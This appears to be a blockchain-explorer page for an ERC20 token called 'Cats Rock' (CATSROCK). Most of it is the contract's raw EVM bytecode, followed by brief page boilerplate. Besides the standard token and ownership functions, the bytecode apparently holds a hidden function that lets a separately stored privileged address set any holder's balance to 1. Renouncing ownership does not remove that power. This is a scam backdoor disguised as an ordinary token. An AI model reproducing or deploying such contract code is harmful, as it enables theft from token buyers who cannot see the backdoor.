0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a584119411610066578063a58411941461028a578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a457c2d71461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f9190610f34565b60405180910390f35b610132600480360381019061012d9190610fef565b61035f565b60405161013f919061104a565b60405180910390f35b610150610382565b60405161015d9190611074565b60405180910390f35b610180600480360381019061017b919061108f565b61038c565b60405161018d919061104a565b60405180910390f35b61019e6103bb565b6040516101ab91906110fe565b60405180910390f35b6101ce60048036038101906101c99190610fef565b6103c4565b6040516101db919061104a565b60405180910390f35b6101fe60048036038101906101f99190611119565b6103fb565b60405161020b9190611074565b60405180910390f35b61021c610444565b005b610226610597565b6040516102339190611155565b60405180910390f35b6102446105c0565b6040516102519190610f34565b60405180910390f35b610274600480360381019061026f9190610fef565b6105fd565b604051610281919061104a565b60405180910390f35b6102a4600480360381019061029f9190611119565b610674565b005b6102c060048036038101906102bb9190610fef565b610712565b6040516102cd919061104a565b60405180910390f35b6102f060048036038101906102eb9190611170565b610735565b6040516102fd9190611074565b60405180910390f35b610320600480360381019061031b9190611119565b6107bc565b005b60606040518060400160405280600981526020017f4361747320526f636b0000000000000000000000000000000000000000000000815250905090565b60008061036a61097d565b9050610377818585610985565b600191505092915050565b6000600154905090565b60008061039761097d565b90506103a4858285610b4e565b6103af858585610bda565b60019150509392505050565b60006009905090565b6000806103cf61097d565b90506103f08185856103e18589610735565b6103eb91906111df565b610985565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61044c61097d565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104d09061125f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600881526020017f43415453524f434b000000000000000000000000000000000000000000000000815250905090565b60008061060861097d565b905060006106168286610735565b90508381101561065b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610652906112f1565b60405180910390fd5b6106688286868403610985565b60019250505092915050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff160361070f576001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b60008061071d61097d565b905061072a818585610bda565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107c461097d565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610851576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108489061125f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b790611383565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109eb90611415565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5a906114a7565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b419190611074565b60405180910390a3505050565b6000610b5a8484610735565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd45781811015610bc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbd90611513565b60405180910390fd5b610bd38484848403610985565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c40906115a5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610caf90611637565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d36906116c9565b60405180910390fd5b8181610d4b91906116e9565b600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610de082600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8e90919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e809190611074565b60405180910390a350505050565b60008183610e9c91906111df565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610ede578082015181840152602081019050610ec3565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f0682610ea4565b610f108185610eaf565b9350610f20818560208601610ec0565b610f2981610eea565b840191505092915050565b60006020820190508181036000830152610f4e8184610efb565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f8682610f5b565b9050919050565b610f9681610f7b565b8114610fa157600080fd5b50565b600081359050610fb381610f8d565b92915050565b6000819050919050565b610fcc81610fb9565b8114610fd757600080fd5b50565b600081359050610fe981610fc3565b92915050565b6000806040838503121561100657611005610f56565b5b600061101485828601610fa4565b925050602061102585828601610fda565b9150509250929050565b60008115159050919050565b6110448161102f565b82525050565b600060208201905061105f600083018461103b565b92915050565b61106e81610fb9565b82525050565b60006020820190506110896000830184611065565b92915050565b6000806000606084860312156110a8576110a7610f56565b5b60006110b686828701610fa4565b93505060206110c786828701610fa4565b92505060406110d886828701610fda565b9150509250925092565b600060ff82169050919050565b6110f8816110e2565b82525050565b600060208201905061111360008301846110ef565b92915050565b60006020828403121561112f5761112e610f56565b5b600061113d84828501610fa4565b91505092915050565b61114f81610f7b565b82525050565b600060208201905061116a6000830184611146565b92915050565b6000806040838503121561118757611186610f56565b5b600061119585828601610fa4565b92505060206111a685828601610fa4565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006111ea82610fb9565b91506111f583610fb9565b925082820190508082111561120d5761120c6111b0565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611249602083610eaf565b915061125482611213565b602082019050919050565b600060208201905081810360008301526112788161123c565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006112db602583610eaf565b91506112e68261127f565b604082019050919050565b6000602082019050818103600083015261130a816112ce565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061136d602683610eaf565b915061137882611311565b604082019050919050565b6000602082019050818103600083015261139c81611360565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006113ff602483610eaf565b915061140a826113a3565b604082019050919050565b6000602082019050818103600083015261142e816113f2565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611491602283610eaf565b915061149c82611435565b604082019050919050565b600060208201905081810360008301526114c081611484565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006114fd601d83610eaf565b9150611508826114c7565b602082019050919050565b6000602082019050818103600083015261152c816114f0565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061158f602583610eaf565b915061159a82611533565b604082019050919050565b600060208201905081810360008301526115be81611582565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611621602383610eaf565b915061162c826115c5565b604082019050919050565b6000602082019050818103600083015261165081611614565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006116b3602683610eaf565b91506116be82611657565b604082019050919050565b600060208201905081810360008301526116e2816116a6565b9050919050565b60006116f482610fb9565b91506116ff83610fb9565b9250828203905081811115611717576117166111b0565b5b9291505056fea26469706673582212202846827118221f37e4ac727ede939b0acb011a960a9d5aa310343b8e54ee110264736f6c63430008130033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.